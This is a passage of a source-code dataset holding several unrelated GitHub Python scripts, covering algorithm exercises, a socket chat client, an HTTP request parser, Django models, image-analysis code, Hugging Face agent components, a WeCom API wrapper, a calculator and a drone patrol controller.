moving.append(frame)\n # get_plot([i/global_variables.max_norm for i in vehicles[v_id].norms])\n except:\n continue\n print(\"Moving \", len(moving))\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"salmedina/Vehice_Action_Classifier","sub_path":"src/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28891580554","text":"from collections import deque\ndef solution(maps):\n # 동,서,남,북\n dx = [0,0,1,-1]\n dy = [1,-1,0,0]\n # 행 n, 열 m\n n = len(maps)\n m = len(maps[0])\n # 거리를 저장\n visited = [[0] * m for _ in range(n)]\n q = deque()\n # (0,0) 에서 시작\n q.append((0,0))\n visited[0][0] = 1\n while q:\n x,y = q.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < m and maps[nx][ny] == 1:\n q.append((nx,ny))\n visited[nx][ny] = visited[x][y] + 1\n maps[nx][ny] = 0\n return visited[-1][-1] if visited[-1][-1] else -1\n","repo_name":"sugenius77/Algorithm-Study","sub_path":"프로그래머스/lv2/게임 맵 최단거리.py","file_name":"게임 맵 최단거리.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13463572442","text":"from sys import stdin\r\nfrom collections import deque, defaultdict\r\ninput = stdin.readline\r\n\r\ns,p = map(int,input().split())\r\ndna = input().rstrip()\r\na,c,g,t = map(int,input().split())\r\n\r\ncnt = defaultdict(int)\r\nleft, right = 0, p-1 \r\ndq = deque(dna[left:right])\r\nfor i in dq:\r\n cnt[i] += 1\r\nans = 0\r\n\r\nwhile right < s:\r\n cnt[dna[right]] += 1\r\n\r\n if cnt['A'] >= a and cnt['C'] >= c and cnt['G'] >= g and cnt['T'] >= t:\r\n ans += 1 \r\n \r\n cnt[dna[left]] -= 1\r\n left += 1\r\n right += 1\r\n\r\nprint(ans) ","repo_name":"yootal/CodingTest","sub_path":"백준/Silver/12891. DNA 비밀번호/DNA 비밀번호.py","file_name":"DNA 비밀번호.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29136483596","text":"from socket import AF_INET, socket, SOCK_STREAM\nfrom threading import Thread, Lock\nimport time\n\n\nclass Client:\n \"\"\"\n for communication with server\n \"\"\"\n HOST = \"192.168.0.21\"\n PORT = 5500\n ADDR = (HOST, PORT)\n BUFSIZ = 512\n\n def __init__(self, name):\n \"\"\"\n Init object and send name to server\n :param name: str\n \"\"\"\n self.client_socket = socket(AF_INET, SOCK_STREAM)\n self.client_socket.connect(self.ADDR)\n self.messages = []\n receive_thread = Thread(target=self.receive_messages)\n receive_thread.start()\n self.send_message(name)\n self.lock = Lock()\n\n def receive_messages(self):\n \"\"\"\n receive messages from server\n :return: None\n \"\"\"\n while True:\n try:\n msg = self.client_socket.recv(self.BUFSIZ).decode()\n\n # make sure memory is safe to access\n self.lock.acquire()\n self.messages.append(msg)\n self.lock.release()\n except Exception as e:\n print(\"[EXCPETION]\", e)\n break\n\n def send_message(self, msg):\n \"\"\"\n send messages to server\n :param msg: str\n :return: None\n \"\"\"\n try:\n self.client_socket.send(bytes(msg, \"utf8\"))\n if msg == \"{quit}\":\n self.client_socket.close()\n except Exception as e:\n self.client_socket = socket(AF_INET, SOCK_STREAM)\n self.client_socket.connect(self.ADDR)\n print(e)\n\n def get_messages(self):\n \"\"\"\n :returns a list of str messages\n :return: list[str]\n \"\"\"\n messages_copy = self.messages[:]\n\n # make sure memory is safe to access\n self.lock.acquire()\n self.messages = []\n self.lock.release()\n\n return messages_copy\n \n def disconnect(self):\n self.send_message(\"{quit}\")","repo_name":"techwithtim/Chat-Web-App","sub_path":"old_msg_server/client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":306,"dataset":"github-code","pt":"54"} +{"seq_id":"19488448771","text":"# encoding: utf-8\n\n\"\"\"\n@author: suhp\n@contact: peace_su@163.com\n@software: PyCharm\n@file: test_thread.py\n@time: 2016/12/23 12:28\n\"\"\"\n\nimport threading\nfrom time import sleep, ctime\n\ncounters = [0, 0]\nbarrier = threading.Barrier(2)\n\ndef count(thread_num, steps):\n for i in range(steps):\n other = counters[1 - thread_num]\n barrier.wait() # wait for reads to complete\n counters[thread_num] = other + 1\n barrier.wait() # wait for writes to complete\n\ndef threaded_count(steps):\n other = threading.Thread(target=count, args=(1, steps))\n other.start()\n count(0, steps)\n print('counters:', counters)\n\nthreaded_count(10)","repo_name":"suheping/python","sub_path":"test/test_thread.py","file_name":"test_thread.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42373325241","text":"from urllib.parse import parse_qs\nfrom utils.DESCrypto import DESCrypto\nfrom config import *\n\n\nclass Request():\n\n def __init__(self):\n self._crypto = DESCrypto(APP_SECRET)\n self.headers = dict()\n self.params = dict()\n self.method = None\n self.path = None\n self.httpVersion = None\n self.data = None\n\n\n\n def getSession(self):\n sessionStr = self.headers.get(\"Cookie\")\n if sessionStr is None:\n return None\n try:\n sessionStr = sessionStr.split(\";\")[0]\n base64Encoded = sessionStr.split(\"=\")[1:]\n base64Encoded = \"=\".join(base64Encoded)\n username = self._crypto.decrypt(base64Encoded)\n return username\n except:\n return None\n\n\n\n @staticmethod\n def getRequest(byteStream):\n '''\n\n :param byteStream:\n :return: Request Object\n '''\n try:\n data = byteStream.decode(\"UTF-8\")\n except:\n print(\"[ByteStream decoding failure]\")\n return None\n\n returnInstance = Request()\n\n httpWords = data.split(\"\\r\\n\")\n\n try:\n requestFields = httpWords[0].split(\" \")\n returnInstance.method = requestFields[0]\n returnInstance.path = requestFields[1]\n returnInstance.httpVersion = requestFields[2]\n except:\n print(\"[Request fields decoding failure]\")\n print(httpWords)\n return None\n\n lineNum = 1\n while lineNum < len(httpWords) and len(httpWords[lineNum]) > 0:\n try:\n headerType, value = httpWords[lineNum].split(\":\")\n returnInstance.headers[headerType] = value\n except:\n pass\n lineNum += 1\n\n lineNum += 1\n\n #handle form data\n if \"Content-Type\" in returnInstance.headers and lineNum < len(httpWords):\n if \"application/x-www-form-urlencoded\" in returnInstance.headers[\"Content-Type\"]:\n data = parse_qs(httpWords[lineNum])\n for k,v in data.items():\n if len(v) == 1:\n data[k] = v[0]\n returnInstance.data=data\n\n\n #handle url params\n if returnInstance.path is not None:\n urlSegs = returnInstance.path.split(\"?\")\n if len(urlSegs)>1:\n params = parse_qs(urlSegs[1])\n for k, v in params.items():\n if len(v) == 1:\n returnInstance.params[k] = v[0]\n else:\n returnInstance.params[k] = v\n \n returnInstance.path = returnInstance.path.split(\"?\")[0]\n\n return returnInstance\n\n\n\n\n\n","repo_name":"Robertation256/MultiClientMessenger","sub_path":"common/templates/Request.py","file_name":"Request.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22307670991","text":"import torch\r\nimport numpy as np \r\nimport numpy as np\r\nimport nibabel as nib\r\nimport scipy.io as scio\r\n\r\nif __name__ == '__main__':\r\n ## lfs_k is the field image with the shape of 2 * H * W * D, where the first channel is real components. \r\n nib_lfs_k = nib.load('lfs_k.nii')\r\n lfs_k = nib_lfs_k.get_fdata() \r\n lfs_k = np.array(lfs_k)\r\n\r\n ## for now pytroch does not support fftshift fucntion, but we can use np.fftshift for fftshift. \r\n lfs_k = np.fft.ifftshift(lfs_k, axes=(1,2,3)) \r\n lfs_k = torch.from_numpy(lfs_k)\r\n\r\n lfs_k = lfs_k.permute(1, 2, 3, 0) ## FFT reconstruciton block. \r\n\r\n lfs_img = torch.ifft(lfs_k, 3)\r\n lfs_img = lfs_img[:,:,:,0] ## get the real channel. 0: real channel, 1, imaginary channel.\r\n lfs_img = lfs_img.numpy()\r\n\r\n path = 'lfs_img.mat'\r\n scio.savemat(path, {'PRED':lfs_img})\r\n print('end')\r\n","repo_name":"sunhongfu/scripts","sub_path":"pytorch_codes/fft_test.py","file_name":"fft_test.py","file_ext":"py","file_size_in_byte":871,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"54"} +{"seq_id":"26335061043","text":"from django.db import models\nfrom django.utils import timezone\n\nCAT_CHOICES = {\n('Animal', 'Animal'),\n('Throwback', 'Throwback'),\n('Trending', 'Trending'),\n('Relationship', 'Relationship'),\n('BlackTwitter', 'BlackTwitter'),\n('Dank', 'Dank'),\n('Wholesome', 'Wholesome'),\n}\n\nclass Post(models.Model):\n user = models.ForeignKey('auth.User')\n category = models.CharField(max_length=200, choices=CAT_CHOICES, default='Trending Memes')\n text = models.TextField()\n published_date = models.DateTimeField(\n blank=True, null=True)\n def approved_comments(self):\n return self.comments.filter(approved_comment=True)\n\n def publish(self):\n self.published_date = timezone.now()\n self.save()\n\n def __str__(self):\n return self.category\n\nclass Comment(models.Model):\n post = models.ForeignKey('Memetropolis.Post', related_name='comments')\n author = models.CharField(max_length=200)\n text = models.TextField()\n created_date = models.DateTimeField(default=timezone.now)\n approved_comment = models.BooleanField(default=False)\n\n def approve(self):\n self.approved_comment = True\n self.save()\n\n def __str__(self):\n return self.text\n# Create your models here.\n","repo_name":"andthephoenix/thelucentdepths","sub_path":"Memetropolis/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74020848482","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('QT5Agg')\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport sys, csv, os\nimport cv2\nfrom tqdm import tqdm\nimport pickle\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.abspath(''), '../..')))\n\nimport hydracv.utils.utils as utils\nfrom hydracv.midline.find_midline_midpoints import extract_midline\n\n\ndef sep_fluo(file_icy, file_dlc, videopath, display=False, start=0, end=-1, scale=(1,1)):\n \"Separate fluorescence to four quarters\"\n\n trace1, trace2, trace3, trace4 = [], [], [], []\n area1, area2, area3, area4 = [], [], [], []\n avg1, avg2, avg3, avg4 = [], [], [], []\n fluos = []\n\n # Load contours and markers\n contours, markers = utils.load_contours_markers(file_icy, file_dlc, scale=scale)\n markers = markers.values\n\n # Loop over frames\n num_frames = len(contours)\n end = num_frames if end == -1 else end\n cap = cv2.VideoCapture(videopath)\n if display:\n plt.figure(figsize=(10,10))\n for iframe in tqdm(range(start, end)):\n\n cap.set(cv2.CAP_PROP_POS_FRAMES, iframe-1)\n ret, frame = cap.read()\n\n marker = markers[iframe]\n contour = contours[iframe]\n\n # Divide contour and extract midpoints\n midpoints, contour_half_1, contour_half_2 = extract_midline(contour, marker, nseg=40)\n midpoints = [(midpoints[i], midpoints[i+1]) for i in range(0, len(midpoints), 2)]\n hyp = midpoints.pop()\n midpoints = np.array(midpoints)\n contour = np.array(contour)\n\n # Extract the polypoints\n midcontour1, index1 = utils.midpoint_of(contour_half_1)\n midcontour2, index2 = utils.midpoint_of(contour_half_2)\n midmid = ((midcontour1[0] + midcontour2[0])/2, (midcontour1[1] + midcontour2[1])/2)\n dist_ref = utils.length_segment([hyp, midmid])\n for index in range(len(midpoints)):\n if utils.length_segment([hyp, midpoints[index]]) <= dist_ref:\n break\n\n poly1_ = np.array(list(midpoints[:index]) + [midmid] + [midcontour1] + list(contour_half_1[:index1+1])[::-1])\n poly2_ = np.array(list(midpoints[:index]) + [midmid] + [midcontour2] + list(contour_half_2[:index2+1])[::-1])\n poly3_ = np.array([midmid] + list(midpoints[index:]) + list(contour_half_1[index1+1:][::-1]) + [midcontour1])\n poly4_ = np.array([midmid] + list(midpoints[index:]) + list(contour_half_2[index2+1:][::-1]) + [midcontour2])\n\n poly1 = np.array([poly1_], dtype = np.int32)\n poly2 = np.array([poly2_], dtype = np.int32)\n poly3 = np.array([poly3_], dtype = np.int32)\n poly4 = np.array([poly4_], dtype = np.int32)\n\n # Handle frame and calculate fluorescence\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n if scale == (2,2):\n frame = frame[::2]\n frame = [x[::2] for x in frame]\n fluo1, fluo2, fluo3, fluo4 = 0, 0, 0, 0\n cframe1, cframe2, cframe3, cframe4 = np.zeros_like(frame), np.zeros_like(frame), np.zeros_like(frame), np.zeros_like(frame)\n cv2.fillPoly(cframe1, poly1, 1)\n cv2.fillPoly(cframe2, poly2, 1)\n cv2.fillPoly(cframe3, poly3, 1)\n cv2.fillPoly(cframe4, poly4, 1)\n a1, a2, a3, a4 = np.sum(cframe1), np.sum(cframe2), np.sum(cframe3), np.sum(cframe4)\n area1.append(a1)\n area2.append(a2)\n area3.append(a3)\n area4.append(a4)\n cframe1, cframe2, cframe3, cframe4 = cframe1 * frame, cframe2 * frame, cframe3 * frame, cframe4 * frame\n fluo1, fluo2, fluo3, fluo4 = np.sum(cframe1), np.sum(cframe2), np.sum(cframe3), np.sum(cframe4)\n trace1.append(fluo1)\n trace2.append(fluo2)\n trace3.append(fluo3)\n trace4.append(fluo4)\n avg1.append(fluo1/a1)\n avg2.append(fluo2/a2)\n avg3.append(fluo3/a3)\n avg4.append(fluo4/a4)\n fluos.append(np.sum(frame))\n\n # Plot\n if display:\n plt.clf()\n\n plt.imshow(frame, cmap='gray')\n\n # plt.plot(contour_half_1[:,0], contour_half_1[:,1], 'g.')\n # plt.plot(contour_half_2[:,0], contour_half_2[:,1], 'g.')\n # plt.plot(midpoints[::2], midpoints[1::2], 'r.')\n # plt.plot(midpoints[:,0], midpoints[:,1], 'r.')\n # plt.plot([midcontour1[0], midcontour2[0]], [midcontour1[1], midcontour2[1]], 'purple', linewidth=3)\n # plt.plot(midcontour2[0], midcontour2[1], 'k.')\n # plt.plot(midmid[0], midmid[1], 'k.')\n # plt.plot(midpoints[index][0], midpoints[index][1], 'g.')\n\n plt.fill(poly1_[:,0], poly1_[:,1], alpha = 0.5, color='b')\n plt.fill(poly2_[:,0], poly2_[:,1], alpha = 0.5, color='orange')\n plt.fill(poly3_[:,0], poly3_[:,1], alpha = 0.5, color='g')\n plt.fill(poly4_[:,0], poly4_[:,1], alpha = 0.5, color='r')\n\n plt.xlim(0, len(frame[0]))\n plt.ylim(0, len(frame))\n plt.pause(0.0001)\n\n # Plot intensities\n fig = plt.figure()\n ax1 = fig.add_subplot(221)\n ax1.plot(trace1, linewidth=0.5)\n ax1.plot(trace2, linewidth=0.5)\n ax1.plot(trace3, linewidth=0.5)\n ax1.plot(trace4, linewidth=0.5)\n ax1.plot([trace1[i] + trace2[i] + trace3[i] + trace4[i] for i in range(len(trace1))], 'k', linewidth=1)\n ax1.tick_params(axis='both', which='major', labelsize=4)\n ax1.set_title('Fluorescence', fontsize=6, fontweight='bold')\n ax2 = fig.add_subplot(222)\n ax2.plot(fluos, 'g', linewidth=0.5)\n ax2.tick_params(axis='both', which='major', labelsize=4)\n ax3 = fig.add_subplot(223)\n ax3.plot(area1, linewidth=0.5)\n ax3.plot(area2, linewidth=0.5)\n ax3.plot(area3, linewidth=0.5)\n ax3.plot(area4, linewidth=0.5)\n ax3.tick_params(axis='both', which='major', labelsize=4)\n ax3.set_title('Areas', fontsize=6, fontweight='bold')\n ax4 = fig.add_subplot(224)\n ax4.plot(avg1, linewidth=0.5)\n ax4.plot(avg2, linewidth=0.5)\n ax4.plot(avg3, linewidth=0.5)\n ax4.plot(avg4, linewidth=0.5)\n ax4.plot([avg1[i] + avg2[i] + avg3[i] + avg4[i] for i in range(len(avg1))], 'k', linewidth=1)\n ax4.tick_params(axis='both', which='major', labelsize=4)\n ax4.set_title('Averages', fontsize=6, fontweight='bold')\n filename = videopath.split('.avi')[0].split('/')[-1]\n pickle.dump(fig, open(\"../data/figures/sep_fluo_\" + filename + \".fig.pickle\", 'wb'))\n plt.close()\n\n return trace1, trace2, trace3, trace4\n\ndef read_paths(filename):\n df = pd.read_json('../data/config.json')\n file_icy, file_dlc, videopath = df[filename].file_icy, df[filename].file_dlc, df[filename].videopath\n return file_icy, file_dlc, videopath\n\nif __name__ == '__main__':\n FILENAME = \"Pre_Bisect_40x_4fps_ex3\"\n file_icy, file_dlc, videopath = read_paths(FILENAME)\n sep_fluo(file_icy,\n file_dlc,\n videopath,\n display=True,\n start=0,\n end=-1,\n scale=(1,1))\n","repo_name":"hengjiwang/hydracv","sub_path":"hydracv/sep_fluo/sep_fluo.py","file_name":"sep_fluo.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72980766881","text":"from xai_components.base import InArg, OutArg, InCompArg, BaseComponent, Component, xai_component\n\nfrom transformers import OpenAiAgent\nfrom transformers import Tool\n\nfrom io import BytesIO\nfrom PIL import Image\nimport tempfile\n\n@xai_component\nclass HfAgentMakeTool(Component):\n run_tool: BaseComponent\n \n name: InCompArg[str]\n description: InCompArg[str]\n output_ref: InCompArg[str]\n \n tool_ref: OutArg[Tool]\n input_ref: OutArg[str]\n \n def execute(self, ctx) -> None:\n other_self = self\n \n class CustomTool(Tool):\n name = other_self.name.value\n description = other_self.description.value\n inputs = [\"text\"]\n output = [\"text\"]\n \n def __call__(self, prompt):\n \n other_self.input_ref.value = prompt\n next = other_self.run_tool\n while next:\n next = next.do(ctx)\n return other_self.output_ref.value\n \n self.tool_ref.value = CustomTool()\n \n \n@xai_component\nclass HfAgentInit(Component):\n agent_type: InCompArg[str]\n \n tools: InArg[list]\n \n\n def execute(self, ctx) -> None:\n if self.agent_type.value == 'openai':\n agent = OpenAiAgent(model=\"text-davinci-003\", additional_tools=self.tools.value)\n ctx['hf_agent'] = agent\n\n\n@xai_component\nclass HfAgentRun(Component):\n prompt: InCompArg[str]\n document: InArg[any]\n response_text: OutArg[str]\n response_file: OutArg[str]\n \n \n def execute(self, ctx) -> None:\n agent = ctx['hf_agent']\n \n if self.document.value:\n if isinstance(self.document.value, bytes):\n image_file = BytesIO(self.document.value)\n self.document.value = Image.open(image_file)\n ret = agent.run(self.prompt.value, document=self.document.value)\n else:\n ret = agent.run(self.prompt.value)\n \n if isinstance(ret, str):\n self.response_text.value = ret\n elif isinstance(ret, Image.Image):\n f = tempfile.NamedTemporaryFile()\n ret.save(f.name + '.png')\n self.response_file.value = f.name + '.png'\n\n@xai_component\nclass HfReadImage(Component):\n file_path: InCompArg[str]\n out_image: OutArg[Image.Image]\n \n def execute(self, ctx) -> None:\n self.out_image.value = Image.open(self.file_path.value)\n","repo_name":"XpressAI/xai-hfagent","sub_path":"hf_agents_components.py","file_name":"hf_agents_components.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39672912194","text":"from max import max_of\n\nprint(\"배열의 최댓값 구하기\")\nprint('End 입력 시, 종료')\n\nnumber = 0\nx = []\nwhile True:\n s = input(f'x[{number}]값을 입력하세요.')\n if s == 'End' : \n break \n x.append(int(s))\n number+=1\n\nprint(f'x의 갯수는 {number}이고, 최댓값은 {max_of(x)}입니다.')\n ","repo_name":"S2chanse/codeTestAlgorithm","sub_path":"chap02/max_of_test_input.py","file_name":"max_of_test_input.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22663041638","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@File : api.py\n@Date : 2023-03-08\n\n企业微信开放API接口\n\"\"\"\nfrom __future__ import print_function, unicode_literals, absolute_import, division\nimport requests\n\n\ndef get_access_token(corpid, corpsecret):\n \"\"\"\n 获取access_token\n https://developer.work.weixin.qq.com/document/path/91039\n\n :param corpid: 企业ID\n :param corpsecret: 应用的凭证密钥\n :return:\n {\n \"errcode\": 0,\n \"errmsg\": \"ok\",\n \"access_token\": \"accesstoken000001\",\n \"expires_in\": 7200\n }\n \"\"\"\n url = 'https://qyapi.weixin.qq.com/cgi-bin/gettoken'\n params = {\n 'corpid': corpid,\n 'corpsecret': corpsecret\n }\n\n res = requests.get(url, params=params)\n return res.json()\n\n\ndef send_message(access_token, body):\n \"\"\"\n 发送应用消息\n https://developer.work.weixin.qq.com/document/path/90236\n\n :param access_token:\n :param body: 消息体\n :return:\n\n {\n \"errcode\" : 0,\n \"errmsg\" : \"ok\",\n \"invaliduser\" : \"userid1|userid2\",\n \"invalidparty\" : \"partyid1|partyid2\",\n \"invalidtag\": \"tagid1|tagid2\",\n \"unlicenseduser\" : \"userid3|userid4\",\n \"msgid\": \"xxxx\",\n \"response_code\": \"xyzxyz\"\n }\n \"\"\"\n url = 'https://qyapi.weixin.qq.com/cgi-bin/message/send'\n\n params = {\n 'access_token': access_token,\n }\n\n res = requests.post(url, params=params, json=body)\n return res.json()\n","repo_name":"mouday/domain-admin","sub_path":"domain_admin/utils/open_api/work_weixin_api.py","file_name":"work_weixin_api.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":1065,"dataset":"github-code","pt":"54"} +{"seq_id":"27780946865","text":"# Создайте программу для игры с конфетами человек против человека.\n# Условие задачи: На столе лежит 2021 конфета.\n# Играют два игрока делая ход друг после друга.\n# Первый ход определяется жеребьёвкой. За один ход можно забрать не более чем 28 конфет.\n# Все конфеты оппонента достаются сделавшему последний ход.\n# Сколько конфет нужно взять первому игроку, чтобы забрать все конфеты у своего конкурента?\n#\n# a) Добавьте игру против бота\n# b) Подумайте как наделить бота \"\"интеллектом\"\"\n\n# Стратегия игры: Если мой ход первый то забрать 6 конфет и после каждого хода противника брать количество конфет\n# 28 - ход противника.\n# Если хожу вторым, то после каждого хода противника брать количество конфет\n# 28 - ход противника.\nimport random\n\n\n# Приветствие и выбор противника\ndef choice_user():\n print \\\n ('Приветствую вас, игроки! Меня зовут Антон!\\n'\n 'Правила игры простые: На столе лежит 2021 конфета.\\n'\n 'За один ход можно забрать не более чем 28 конфет.'\n 'Чей ход последний, тот выиграл и забирает все конфеты!')\n choice_user = input \\\n ('Если вы хотите играть со мной в эту игру,\\n'\n 'введите: Y'\n '\\nЕсли вы хотите играть вдвоем, введите: N\\n')\n if choice_user.lower() == 'y':\n complexity = int(input('Выберитe уровень сложности\\nЛегкий - введите 1\\nСложный - введите 2\\n'))\n if complexity == 1:\n return 'auto'\n elif complexity == 2:\n return 'auto_smart'\n else:\n print('Не корректный ввод')\n return choice_user()\n elif choice_user.lower() == 'n':\n return 'hand'\n else:\n print('Не корректный ввод')\n return choice_user()\n\n\n# Ввод имени игрока\ndef hand_play():\n name = input('Введите имя игрока: ')\n return name\n\n\n# Чей следущий ход\ndef play_label(number_label, name_one=1, name_two=2):\n if number_label == 0:\n print(f'Ход игрока {name_two}:')\n number_label = 1\n elif number_label == 1:\n print(f'Ход игрока {name_one}:')\n number_label = 0\n else:\n return\n return number_label\n\n\n# Поговори с Антоном\ndef voice_anton():\n voice_list = \\\n ['Не тормози, это простая игра!', 'Мне кажется я уже выиграл!',\n 'Эту цифру я видел во сне', 'Твой ход дружище!', 'А у тебя конфеты с какой начинкой?']\n print(random.choice(voice_list))\n\n\n# Ход бота Антон\ndef auto_player():\n move = random.randint(1, 28)\n print(f'Я возьму {move} конфет(ы)')\n voice_anton()\n return move\n\n# Ход умного бота Антон\ndef smart_auto_player(move_user):\n fix_number = 28\n if move_user < fix_number:\n move = fix_number - move_user\n print(f'Я возьму {move} конфет(ы)')\n voice_anton()\n return move\n elif move_user == fix_number:\n move = fix_number\n print(f'Я возьму {move} конфет(ы)')\n voice_anton()\n return move\n\n\n# Ход игрока\ndef play():\n players_move_in = int(input())\n return players_move_in\n\n\n# Метод подсчета оставшихся конфет\ndef players_move(user_numbers, volume):\n if user_numbers <= 28:\n volume = volume - user_numbers\n return volume\n else:\n print('Число не может превышать 28! Вы проиграли!')\n return game(choice_user())\n\n\n# Кто победил\ndef winner(number_label, name_p_one, name_p_two):\n if number_label == 0:\n print(f'Все конфеты достаются победителю - {name_p_two}!!!')\n else:\n print(f'Все конфеты достаются победителю - {name_p_one}!!!')\n\n\n# Игра с конфетами\ndef game(choice):\n max_of_one_step = 28\n candy_bank = 2021\n flag = random.randint(0, 1)\n names = hand_play()\n if choice == 'hand':\n names_two = hand_play()\n elif choice == 'auto':\n names_two = 'Anton'\n elif choice == 'auto_smart':\n names_two = 'Anton'\n flag = 1\n game_while(max_of_one_step, candy_bank, names, names_two, choice, flag)\n\n# Цикл игры\ndef game_while(max_of_one_step, candy_bank, names, names_two, choice, flag):\n while candy_bank > max_of_one_step:\n if flag == 1:\n flag = play_label(flag, names, names_two)\n number_selected_player = play()\n candy_bank = players_move(number_selected_player, candy_bank)\n else:\n if choice == 'auto':\n flag = play_label(flag, names, names_two)\n candy_bank = players_move(auto_player(), candy_bank)\n elif choice == 'auto_smart':\n flag = play_label(flag, names, names_two)\n candy_bank = players_move(smart_auto_player(number_selected_player), candy_bank)\n elif choice == 'hand':\n flag = play_label(flag, names, names_two)\n candy_bank = players_move(play(), candy_bank)\n print(f'Число конфет на столе: {candy_bank}')\n winner(flag, names, names_two)\n# Добрый день, Сергей. Если вы дочитали до этого места - вы реально крутой преподаватель))))\n# Буду благодарен если дадите развернутый комментарий по дз. Для человека без опыта это было бы очень вдохновляюще\n# Спасибо :-)))\n\n# Запуск игры\ngame(choice_user())\n","repo_name":"Georgvit/PythonOneClass","sub_path":"Home_work/h_w_23.py","file_name":"h_w_23.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5247255212","text":"import math\r\nimport os\r\nfrom time import sleep\r\n\r\n# Declaração de Variáveis \r\ncolor = {'limpa':\"\\033[m\", 'azul':'\\033[34m', 'amarelo':'\\033[33m'}\r\nspace = ' '* 35\r\nopcao = 1\r\n\r\n# Declaração funções\r\ndef soma(a, b):\r\n soma = a + b\r\n return soma\r\n\r\ndef subtracao(a, b):\r\n subtr = a - b\r\n return subtr\r\n\r\ndef multiplicacao(a, b):\r\n multip = a * b\r\n return multip\r\n\r\ndef divisao(a, b):\r\n divisao = a / b\r\n return divisao\r\n\r\ndef limpar():\r\n os.system('CLS')\r\n\r\n\r\n# Calculadora \r\nwhile opcao != 0:\r\n limpar()\r\n print('=-' * 40, '\\n{}CALCULADORA\\n'.format(space), '=-' * 40)\r\n print('[ 1 ] SOMA \\n[ 2 ] SUBTRAÇÃO\\n[ 3 ] MULTIPLICAÇÃO\\n[ 4 ] DIVISÃO\\n\\n[ 0 ] Sair')\r\n opcao = int(input('Selecione uma das opções: '))\r\n \r\n if opcao == 1:\r\n print('\\nSOMA\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n soma(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 2:\r\n print('\\nSUBTRAÇÃO\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n subtracao(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 3:\r\n print('\\nMULTIPLICAÇÃO\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n multiplicacao(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 4:\r\n print('\\nDIVISÃO\\n')\r\n num1 = float(input('Digite o primeiro número: '))\r\n num2 = float(input('Digite o segundo número: '))\r\n \r\n divisao(num1, num2)\r\n sleep(10)\r\n \r\n elif opcao == 0:\r\n break\r\n \r\n else:\r\n print('Por favor, digite uma opção válida!!')\r\n sleep(2)","repo_name":"rafaelbazolli/Python","sub_path":"ExemploCalculadora.py","file_name":"ExemploCalculadora.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32130959256","text":"''' This program will launch a patrol between differents positions with virtuals obstacles'''\nimport time\nimport cflib.crtp\nfrom cflib.crazyflie.swarm import CachedCfFactory\nfrom cflib.crazyflie.swarm import Swarm\nfrom math import cos, sin\nfrom random import randint, random\n\nglobal Dict_link_Sec_drone\nDict_link_Sec_drone={}\nflying_time=30\n# Change uris and sequences according to your setup\nURI1 = 'radio://0/80/2M/E7E7E7E703'\n\n\n# List of URIs, comment the one you do not want to fly\nuris = {\n URI1,\n}\n\n\ndef wait_for_param_download(scf):\n while not scf.cf.param.is_updated:\n time.sleep(1.0)\n print('Parameters downloaded for', scf.cf.link_uri)\n\n\nclass Sec_drone:\n def __init__(self,liste_drone,leader):\n self.liste_drone=liste_drone\n #Agent Optitrack position\n self.cam_X=0\n self.cam_Y=0\n self.cam_Z=0\n #flags\n self.curent_obj=[0,0]\n self.Yawc=0\n self.pitch_command=0\n self.roll_command=0\n self.flag=False\n self.vertical_velocity_command=0\n self.yaw_velocity_command=0\n self.cam_position_received=0\n #Previous position (to compute velocity)\n self.previous_X=0\n self.previous_Y=0\n self.previous_Z=0\n #self.set_cam_coord(x,y,0)\n self.cam_yaw=0\n #Voisin proch\n self.leader=leader\n self.control_enable=0 \n self.patrol_st=0\n self.i=0\n self.tmp_point=[0,0,0.4]\n #fly modification\n self.voisin=[[0.2,0.2]] #list of obstacles\n self.K_objectif=1 #strength of the objectif\n self.disance_unit=0.20 #distance between the drone and the temporary objectif\n self.urgence= 0.4 #distance of emergency\n self.K_urgence=0.7 #strength of the emergency\n self.hauteur=0.3 #height of 